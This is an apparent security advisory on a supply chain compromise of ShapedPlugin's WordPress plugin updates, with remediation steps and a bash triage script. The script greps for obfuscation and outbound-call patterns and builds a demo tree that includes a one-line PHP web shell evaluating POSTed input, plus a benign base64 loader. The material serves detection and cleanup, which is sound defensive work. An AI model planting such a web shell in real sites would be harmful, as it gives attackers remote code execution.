ShapedPlugin Supply Chain Attack Delivers Malware Through Official WordPress Plugin Updates
Official Update Channel Weaponized Against Paying Customers
Attackers have compromised ShapedPlugin's plugin update delivery infrastructure, pushing malware-laced releases directly to WordPress sites through the vendor's own official update system. Multiple ShapedPlugin plugins were affected, with infected packages distributed specifically to paying customers — the users most likely to have automatic updates enabled and to trust what their licensed software serves them.
ShapedPlugin publishes a suite of widely used WordPress plugins, including WP Carousel, Easy Accordion and Restaurant Menu / Food Ordering System, with a combined install base in the hundreds of thousands of sites. The attack did not require exploiting a vulnerability in the plugins themselves; the threat actor compromised the upstream distribution pipeline instead, so the usual integrity assumption, that a build served by the vendor's own update endpoint is the vendor's code, no longer held.
Why This Is Worse Than a Normal Plugin Vulnerability
A supply chain attack through an official update mechanism is harder to defend against than a disclosed CVE. With a CVE you know what is broken, and the fix is to patch. Here the patch was the attack vector: every site configured to auto-update ShapedPlugin products, the recommended posture for most WordPress operators, silently received the compromised build, and nothing about the update looked abnormal from the site's side.
WordPress powers roughly 40% of the public web, and plugin supply chain compromises are an increasingly favored tactic precisely because trust in update channels is high. Malicious code delivered this way can establish backdoors, exfiltrate credentials or session tokens, inject payment skimmers, or enroll the site in a botnet — all before anyone notices the update happened.
Paying customers are disproportionately at risk here. Premium editions are not hosted on wordpress.org, so their updates bypass the repository and its review; they are fetched from the vendor's own update endpoint, typically authenticated with a license key, which makes that endpoint the single trust anchor for the code that lands on the site. Licensed users are also more likely to run set-and-forget auto-update policies.
What To Do Right Now
1. Audit your plugin inventory. Check every WordPress installation for ShapedPlugin products. Look for WP Carousel Free/Pro, Easy Accordion Free/Pro, Restaurant Menu / Food Ordering System and any other plugin whose Author header reads ShapedPlugin. Check the Author field (on the Plugins screen, or in the header of the main file under wp-content/plugins/<slug>/) rather than matching on product names alone, since similar-sounding plugins from unrelated vendors exist.
2. Do not update further until clean builds are confirmed. Disable automatic updates for ShapedPlugin plugins for now, and monitor the vendor's official communications and the wordpress.org plugin pages for statements on which version numbers are safe. Pausing updates does not undo a malicious build that is already installed; it stays in place and running until you replace it. Once the vendor names a clean version, reinstall it and treat the time between the bad update and the reinstall as the compromise window for the checks below.
3. Scan for indicators of compromise. Run a server-side malware scanner (Wordfence, MalCare, or a CLI tool like maldet) against wp-content/plugins/ for affected plugins. Look specifically for obfuscated PHP, unexpected eval(), base64_decode() chains, or outbound curl calls added to plugin files. For a free edition that was not itself among the affected packages, a clean copy of the same version can be downloaded from the wordpress.org plugin directory and compared file by file with diff -r; a Pro build has no public reference, so each suspicious construct in it has to be judged on its own.
4. Check for persistent backdoors. Attackers who gain code execution often drop a secondary backdoor outside the plugin directory. Scan wp-content/uploads/ (which should contain no PHP at all), theme directories, wp-content/mu-plugins/ and wp-config.php itself for recently modified or unexpected PHP. Modification times can be backdated with touch, so check ctime as well and do not treat an old mtime as proof that a file is clean.
5. Review access logs. Look for unusual POST requests, outbound connections to unfamiliar IPs, and admin account creation events in the window after the compromised update would have been installed. Also check wp_users for administrator accounts you did not create and the cron array in wp_options for scheduled events you do not recognize, both common persistence mechanisms.
6. Rotate credentials if any doubt exists. WordPress admin passwords, database credentials, and any API keys stored in wp-config.php or plugin settings should be rotated if you cannot rule out compromise. Regenerate the authentication keys and salts in wp-config.php as well; that invalidates every existing login session, including any the attacker holds.
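The first four steps above can be scripted. The helper below is an added example, not ShapedPlugin's or WordPress's own tooling: it inventories plugins by the Author header, greps PHP under wp-content for the eval/base64_decode/curl constructs listed in step 3, and finds recently changed PHP for step 4. It assumes the standard WordPress plugin header convention and the standard wp-content layout. The plugin slugs, file contents and the version string 0.0.0-sample in the sample tree it builds are constructed for the demo and are not the affected versions; the grep patterns are heuristics and every hit needs a human look.

```shell
#!/usr/bin/env bash
# Added triage helper (example code, not the vendor's). Run with no arguments to
# exercise it against a constructed sample tree; pass a real wp-content path to
# triage a live install:  ./wp-triage.sh /var/www/html/wp-content
set -u

# 1. Inventory: print "slug<TAB>name<TAB>version" for every plugin under $1 whose
#    header Author matches $2. Only the conventional layout plugins/<slug>/<main>.php
#    is inspected; single-file plugins dropped directly into plugins/ are skipped.
list_plugins_by_author() {
  local plugins_dir="$1" author="$2" f hdr name ver
  for f in "$plugins_dir"/*/*.php; do
    [ -f "$f" ] || continue
    hdr=$(head -n 60 "$f")      # the header block sits in the first lines of the file
    printf '%s\n' "$hdr" | grep -qiE "^[[:space:]]*\*?[[:space:]]*Author:[[:space:]]*$author" || continue
    name=$(printf '%s\n' "$hdr" | sed -nE 's/^[[:space:]]*\*?[[:space:]]*Plugin Name:[[:space:]]*(.*)$/\1/p' | head -n 1)
    ver=$(printf '%s\n' "$hdr" | sed -nE 's/^[[:space:]]*\*?[[:space:]]*Version:[[:space:]]*(.*)$/\1/p' | head -n 1)
    [ -n "$name" ] || continue
    printf '%s\t%s\t%s\n' "$(basename "$(dirname "$f")")" "$name" "$ver"
  done
}

# 2. IoC sweep: every PHP file under $1, grepped for the primitives injected code
#    leans on. Output is grep's "file:line:text". Legitimate plugins occasionally
#    use base64_decode or file_get_contents, so review hits rather than auto-deleting.
scan_suspicious_php() {
  grep -rnE --include='*.php' \
    -e '(^|[^A-Za-z0-9_])eval[[:space:]]*\(' \
    -e 'base64_decode[[:space:]]*\(' \
    -e '(gzinflate|gzuncompress|str_rot13)[[:space:]]*\(' \
    -e '(curl_exec|curl_init|fsockopen|file_get_contents)[[:space:]]*\(.*https?://' \
    "$1" 2>/dev/null
}

# 3. Persistence sweep: PHP files under $1 changed within the last $2 days. Both
#    mtime and ctime are tested because touch(1) can backdate mtime but not ctime.
#    wp-content/uploads should hold no PHP at all, so any hit there is suspect.
recent_php() {
  find "$1" -type f -name '*.php' \( -mtime -"$2" -o -ctime -"$2" \)
}

# Constructed sample wp-content tree for the demo: one ShapedPlugin-authored plugin
# with an injected loader, one unrelated plugin, and a dropper parked under uploads/.
# Names and versions here are fabricated, not the real affected releases.
build_sample_tree() {
  local root="$1"
  mkdir -p "$root/plugins/wp-carousel-free/includes" "$root/plugins/akismet" "$root/uploads/2024/05"
  cat > "$root/plugins/wp-carousel-free/wp-carousel-free.php" <<'EOF'
<?php
/**
 * Plugin Name: WP Carousel
 * Author: ShapedPlugin
 * Version: 0.0.0-sample
 */
EOF
  cat > "$root/plugins/wp-carousel-free/includes/class-loader.php" <<'EOF'
<?php
eval(base64_decode("ZWNobyAnaGknOw=="));
EOF
  cat > "$root/plugins/akismet/akismet.php" <<'EOF'
<?php
/*
Plugin Name: Akismet Anti-spam
Author: Automattic
Version: 0.0.0-sample
*/
EOF
  cat > "$root/uploads/2024/05/wp-cache.php" <<'EOF'
<?php
$c = base64_decode($_POST['c'] ?? ''); eval($c);
EOF
}

main() {
  local root="${1:-}"
  if [ -z "$root" ]; then
    root=$(mktemp -d)
    build_sample_tree "$root"
    echo "# no path given, using constructed sample tree at $root"
  fi
  echo "## plugins with Author: ShapedPlugin"
  list_plugins_by_author "$root/plugins" ShapedPlugin
  echo "## suspicious constructs in PHP under $root"
  scan_suspicious_php "$root"
  echo "## PHP under uploads/ changed in the last 7 days"
  recent_php "$root/uploads" 7
}
main "$@"
```

For step 2, WP-CLI can both show and change the auto-update state of the plugins the inventory turns up: wp plugin list --fields=name,version,auto_update shows which ones have it on, and wp plugin auto-updates disable <slug> turns it off per plugin. The scan functions only see files on disk; a payload that ran once and wrote its persistence elsewhere is what step 4 and the log review in step 5 are for.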